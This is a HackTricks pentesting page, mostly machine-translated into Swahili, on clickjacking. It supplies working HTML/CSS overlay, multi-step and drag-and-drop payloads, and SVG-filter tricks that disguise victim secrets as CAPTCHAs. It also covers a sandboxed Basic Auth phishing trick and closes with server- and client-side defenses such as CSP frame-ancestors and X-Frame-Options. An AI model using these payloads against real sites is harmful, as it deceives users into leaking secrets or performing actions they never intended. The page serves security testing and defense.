Clickjacking

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Clickjacking ni nini

Katika Clickjacking attack, mtumiaji amedanganywa ili kubofya kipengee kwenye ukurasa wa wavuti ambacho ni kisichoonekana au kimefichwa kama kipengee kingine. Uendeshaji huu unaweza kusababisha matokeo yasiyotarajiwa kwa mtumiaji, kama vile kupakua malware, kuelekezwa tena kwa kurasa za wavuti zenye madhara, kutoa credentials au taarifa nyeti, kuhamisha pesa, au kununua bidhaa mtandaoni.

Triki ya kujaza fomu mapema

Mara nyingine inawezekana fill the value of fields of a form using GET parameters when loading a page. Mshambuliaji anaweza kutumia tabia hii kujaza fomu kwa data yoyote na kutuma clickjacking payload ili mtumiaji abofye kitufe cha Submit.

Kujaza fomu kwa Drag&Drop

Ikiwa unahitaji mtumiaji kujaza fomu lakini hautaki kumuomba moja kwa moja aweke taarifa maalum (kama barua pepe au nywila maalum unazozijua), unaweza kumwomba tu Drag&Drop kitu kitakachoandika data unayodhibiti kama katika mfano huu.

Payload ya msingi

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Payload ya hatua nyingi

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Payload ya Drag&Drop + Click

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

Ikiwa umegundua shambulio la XSS linalomhitaji mtumiaji kubofya kwenye kipengele fulani ili kusababisha XSS na ukurasa uko dhaifu kwa Clickjacking, unaweza kulitumia kumdanganya mtumiaji kubofya kitufe/kiungo.
Mfano:
Umegundua self XSS katika baadhi ya maelezo ya kibinafsi ya akaunti (maelezo ambayo ni wewe tu unaweza kuweka na kusoma). Ukurasa ulio na fomu ya kuweka maelezo haya uko dhaifu kwa Clickjacking na unaweza kujazwa awali fomu kwa GET parameters.
Mshambuliaji anaweza kuandaa shambulio la Clickjacking kwa ukurasa huo kwa kujazwa awali kwa fomu na XSS payload na kumdanganya mtumiaji ili kubofya fomu. Hivyo, wanapowasilisha fomu na thamani zikibadilishwa, mtumiaji ataendesha XSS.

DoubleClickjacking

Kwanza imeelezewa katika chapisho hili, mbinu hii itaomba mwathiriwa kubofya mara mbili kitufe cha ukurasa maalum uliowekwa mahali fulani, na kutumia tofauti za muda kati ya matukio ya mousedown na onclick kupakia ukurasa wa mwathiriwa wakati wa bonyeza mara mbili ili mwathiriwa kwa kweli abofye kitufe halali kwenye ukurasa wa mwathiriwa.

Mfano unaweza kuiona katika video hii: https://www.youtube.com/watch?v=4rGvRRMrD18

Mfano wa msimbo unaweza kupatikana katika ukurasa huu.

Warning

Teknikia hii inaruhusu kumdanganya mtumiaji kubofya mahali moja kwenye ukurasa wa mwathiriwa ikivuka ulinzi wote dhidi ya clickjacking. Kwa hivyo mshambuliaji anahitaji kupata vitendo nyeti vinavyoweza kufanywa kwa bonyeza moja tu, kama prompts za OAuth zinazokubali ruhusa.

SVG Filters / Cross-Origin Iframe UI Redressing

Toleo za kisasa za Chromium/WebKit/Gecko zinawezesha CSS filter:url(#id) kutumika kwa iframes za cross-origin. Pikseli za iframe zilizoratibishwa zinaonyeshwa kwenye grafu ya SVG filter kama SourceGraphic, hivyo primitives kama feDisplacementMap, feBlend, feComposite, feColorMatrix, feTile, feMorphology, n.k. zinaweza kubadili kwa hiari UI ya mwathiriwa kabla mtumiaji hajaiiona, hata ingawa mshambuliaji hakugusana na DOM. Filter rahisi ya mtindo Liquid-Glass inaonekana kama:

<iframe src="https://victim.example" style="filter:url(#displacementFilter4)"></iframe>

• Misingi muhimu: feImage loads attacker bitmaps (e.g., overlays, displacement maps); feFlood builds constant-color mattes; feOffset/feGaussianBlur refine highlights; feDisplacementMap refracts/warps text; feComposite operator="arithmetic" implements arbitrary per-channel math (r = k1*i1*i2 + k2*i1 + k3*i2 + k4), which is enough for contrast boosting, masking, and AND/OR operations; feTile crops and replicates pixel probes; feMorphology grows/shrinks strokes; feColorMatrix moves luma into alpha to build precise masks.

Kuvuruga siri kuwa maombi ya mtindo wa CAPTCHA

Ikiwa framable endpoint inaonyesha secrets (tokens, reset codes, API keys), mshambuliaji anaweza kuzipindisha ili ziwe kama CAPTCHA na kulazimisha uandishi wa mkono:

<svg width="0" height="0">
<filter id="captchaFilter">
<feTurbulence type="turbulence" baseFrequency="0.03" numOctaves="4" result="noise" />
<feDisplacementMap in="SourceGraphic" in2="noise" scale="6" xChannelSelector="R" yChannelSelector="G" />
</filter>
</svg>
<iframe src="https://victim" style="filter:url(#captchaFilter)"></iframe>
<input pattern="^6c79 ?7261 ?706f ?6e79$" required>

Pikseli zilizochafuliwa zimudanganya mtumiaji ili “kutatua” captcha ndani ya <input> inayodhibitiwa na mshambuliaji, ambayo pattern inalazimisha siri halisi ya mwathirika.

Kurekebisha muktadha wa pembejeo za mwathirika

Filters zinaweza kufuta kwa uangalifu maandishi ya placeholder/validation huku zikihifadhi vinaboreshaji vya mtumiaji. Mchakato mmoja:

1. feComposite operator="arithmetic" k2≈4 huongeza mwangaza hadi maandishi ya msaada ya kijivu yaegeuke nyeupe.
2. feTile inapunguza eneo la kazi hadi mstatili wa input.
3. feMorphology operator="erode" inaongeza unene wa herufi za giza zilizobonyezwa na mwathirika na kuziweka kupitia result="thick".
4. feFlood huunda sahani nyeupe, feBlend mode="difference" na thick, na feComposite k2≈100 ya pili huibadilisha kuwa luma matte kali.
5. feColorMatrix huhamisha luma hiyo kwenda alpha, na feComposite in="SourceGraphic" operator="in" huhifadhi tu herufi zilizowekwa na mtumiaji.
6. feBlend in2="white" nyingine pamoja na upunguzaji mwembamba hutoa kisanduku cha maandishi safi, baada yake mshambuliaji anaweka lebo zao za HTML (kwa mfano, “Ingiza barua pepe yako”) wakati iframe iliyo fichwa bado inatekeleza sera ya nywila ya asili ya mwathirika.

Safari inashindwa na feTile; athari ile ile inaweza kurekebishwa kwa spatial mattes zilizojengwa kutoka feFlood + feColorMatrix + feComposite kwa payloads za WebKit pekee.

Upimaji wa pikseli, mantiki na mashine za hali

Kwa kukata eneo la 2–4 px kwa feTile na kulitila hadi 100% ya viewport, mshambuliaji hubadilisha rangi iliyochaguliwa kuwa texture ya fremu nzima ambayo inaweza kuwekwa kizingiti kuwa mask ya boolean:

<filter id="pixelProbe">
<feTile x="313" y="141" width="4" height="4" />
<feTile x="0" y="0" width="100%" height="100%" result="probe" />
<feComposite in="probe" operator="arithmetic" k2="120" k4="-1" />
<feColorMatrix type="matrix" values="0 0 0 0 0  0 0 0 0 0  0 0 0 0 0  0 0 1 0 0" result="mask" />
<feGaussianBlur in="SourceGraphic" stdDeviation="2" />
<feComposite operator="in" in2="mask" />
<feBlend in2="SourceGraphic" />
</filter>

Kwa rangi yoyote, rejea feFlood (mfano, #0B57D0) pamoja na feBlend mode="difference" na composite nyingine ya kihesabu (k2≈100, k4 kama uvumilivu) hutoka nyeupe tu wakati pikseli iliyochaguliwa ina fanana na tona lengwa. Kuwasha hizi mask kwa feComposite na k1..k4 zilizowekwa kwa uangalifu huleta logic gates: AND kwa k1=1, OR kwa k2=k3=1, XOR kwa feBlend mode="difference", NOT kwa kuchanganya dhidi ya nyeupe. Kuunganisha gates hufanya a full adder ndani ya filter graph, ikionyesha pipeline ni functionally complete.

Wavamizi wanaweza hivyo kusoma hali ya UI bila JavaScript. Mifano ya boolean kutoka kwenye mtiririko wa modal:

• D (dialogi inayoonekana): chunguza kona iliyopigwa giza na ujaribu dhidi ya nyeupe.
• L (dialogi imepakiwa): chunguza kuratibu ambapo kitufe kinaonekana mara kitakapokuwa tayari.
• C (checkbox imechaguliwa): linganisha pikseli ya checkbox dhidi ya active blue #0B57D0.
• R (bango nyekundu la mafanikio/mafeli): tumia feMorphology na red thresholds ndani ya mstatili wa bango.

Kila hali inayogunduliwa inagate overlay bitmap tofauti iliyowekwa kupitia feImage xlink:href="data:...". Kufunika hizo bitmap kwa D, L, C, R kunahakikisha overlays zinaendana na dialogi halisi na kuwasogeza mwathiriwa kupitia taratibu zenye hatua nyingi (password resets, approvals, destructive confirmations) bila kumfichua DOM.

Sandboxed iframe Basic Auth dialog (no allow-popups)

Iframe iliyo kwenye sandbox bila allow-popups bado inaweza kuonyesha browser-controlled HTTP Basic Authentication modal wakati mzigo unarudisha 401 pamoja na WWW-Authenticate. Dialogi inazaliwa na safu ya networking/auth ya browser (si JS alert/prompt/confirm), kwa hivyo vizuizi vya popup ndani ya sandbox haviitishi. Ikiwa unaweza ku-script iframe (mfano, sandbox="allow-scripts"), unaweza kuibadilisha kwenda kwenye endpoint yoyote inayotoa changamoto ya Basic Auth:

<iframe id="basic" sandbox="allow-scripts"></iframe>
<script>
basic.src = "https://httpbin.org/basic-auth/user/pass"
</script>

Mara tu jibu linapowajia, browser huomba credentials ingawa popups haziruhusiwi. Kuframing origin yenye kuaminika kwa mbinu hii kunawawezesha UI redress/phishing: unexpected modal prompts ndani ya widget “sandboxed” zinaweza kuwachanganya watumiaji au kusababisha password managers kutoa credentials zilizosimamiwa.

Browser extensions: DOM-based autofill clickjacking

Aside from iframing victim pages, attackers can target browser extension UI elements that are injected into the page. Password managers render autofill dropdowns near focused inputs; by focusing an attacker-controlled field and hiding/occluding the extension’s dropdown (opacity/overlay/top-layer tricks), a coerced user click can select a stored item and fill sensitive data into attacker-controlled inputs. This variant requires no iframe exposure and works entirely via DOM/CSS manipulation.

• For concrete techniques and PoCs see: BrowExt - ClickJacking

Strategies to Mitigate Clickjacking

Client-Side Defenses

Scripts executed on the client side can perform actions to prevent Clickjacking:

• Kuhakikisha dirisha la application ndilo dirisha kuu au top window.
• Kufanya frames zote zioneke.
• Kuzuia clicks kwenye frames zisizoonekana.
• Kutambua na kuwaonya watumiaji kuhusu jaribio za Clickjacking.

Hata hivyo, scripts hizi za frame-busting zinaweza kupinduliwa:

• Mipangilio ya Usalama ya browser: Baadhi ya browsers zinaweza kuzuia scripts hizi kutokana na mipangilio yao ya usalama au ukosefu wa msaada wa JavaScript.
• HTML5 iframe sandbox Attribute: An attacker can neutralize frame buster scripts by setting the sandbox attribute with allow-forms or allow-scripts values without allow-top-navigation. This prevents the iframe from verifying if it is the top window, e.g.,

<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>

The allow-forms and allow-scripts values enable actions within the iframe while disabling top-level navigation. To ensure the intended functionality of the targeted site, additional permissions like allow-same-origin and allow-modals might be necessary, depending on the attack type. Browser console messages can guide which permissions to allow.

Ulinzi upande wa seva

X-Frame-Options

The X-Frame-Options HTTP response header informs browsers about the legitimacy of rendering a page in a <frame> or <iframe>, helping to prevent Clickjacking:

• X-Frame-Options: deny - Hakuna domaini inayoweza kuweka yaliyomo ndani ya frame.
• X-Frame-Options: sameorigin - Ni tovuti hiyo hiyo tu inayoweza kuweka yaliyomo ndani ya frame.
• X-Frame-Options: allow-from https://trusted.com - Ni ‘uri’ maalum tu iliyotajwa inaweza kuweka ukurasa ndani ya frame.
• Note the limitations: if the browser doesn’t support this directive, it might not work. Some browsers prefer the CSP frame-ancestors directive.

Content Security Policy (CSP) frame-ancestors directive

frame-ancestors directive in CSP ni njia inayopendekezwa kwa ulinzi dhidi ya Clickjacking:

• frame-ancestors 'none' - Inafanana na X-Frame-Options: deny.
• frame-ancestors 'self' - Inafanana na X-Frame-Options: sameorigin.
• frame-ancestors trusted.com - Inafanana na X-Frame-Options: allow-from.

For instance, the following CSP only allows framing from the same domain:

Content-Security-Policy: frame-ancestors 'self';

Further details and complex examples can be found in the frame-ancestors CSP documentation and Mozilla’s CSP frame-ancestors documentation.

Content Security Policy (CSP) na child-src na frame-src

Content Security Policy (CSP) ni hatua ya usalama inayosaidia kuzuia Clickjacking na mashambulizi mengine ya kuingiza code kwa kueleza vyanzo ambavyo kivinjari kinapaswa kuruhusu kupakia yaliyomo.

frame-src Directive

• Defines valid sources for frames.
• More specific than the default-src directive.

Content-Security-Policy: frame-src 'self' https://trusted-website.com;

Sera hii inaruhusu frames kutoka same origin (self) na https://trusted-website.com.

child-src Amri

• Imeletwa katika CSP level 2 ili kuweka vyanzo halali kwa web workers na frames.
• Inafanya kazi kama mbadala kwa frame-src na worker-src.

Content-Security-Policy: child-src 'self' https://trusted-website.com;

Sera hii inaruhusu frames na workers kutoka asili ile ile (self) na https://trusted-website.com.

Vidokezo vya Matumizi:

• Kuachishwa: child-src inaondolewa taratibu na kubadilishwa na frame-src na worker-src.
• Tabia ya Mbali (Fallback): Ikiwa frame-src haipo, child-src inatumika kama mbadala kwa frames. Ikiwa zote mbili hazipo, default-src inatumika.
• Ufafanuzi Mkali wa Chanzo: Jumuisha vyanzo vinavyotegemewa tu katika maagizo ili kuzuia matumizi mabaya.

Skripti za JavaScript za kuvunja frame

Ingawa si kamilifu kabisa, skripti za JavaScript za frame-busting zinaweza kutumika kuzuia ukurasa wa wavuti kutiwa frame. Mfano:

if (top !== self) {
top.location = self.location
}

Kutumia Anti-CSRF Tokens

• Token Validation: Tumia anti-CSRF tokens katika programu za wavuti ili kuhakikisha kwamba maombi yanayobadilisha hali yamefanywa kwa kusudi na mtumiaji na sio kupitia ukurasa uliokuwa ume-Clickjacked.

Marejeo

• https://portswigger.net/web-security/clickjacking
• https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html
• DOM-based Extension Clickjacking (marektoth.com)
• SVG Filters - Clickjacking 2.0
• Iframe sandbox Basic Auth modal
• Chromestatus: Restrict sandboxed frame dialogs
• Chromium issue about sandboxed auth dialogs

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.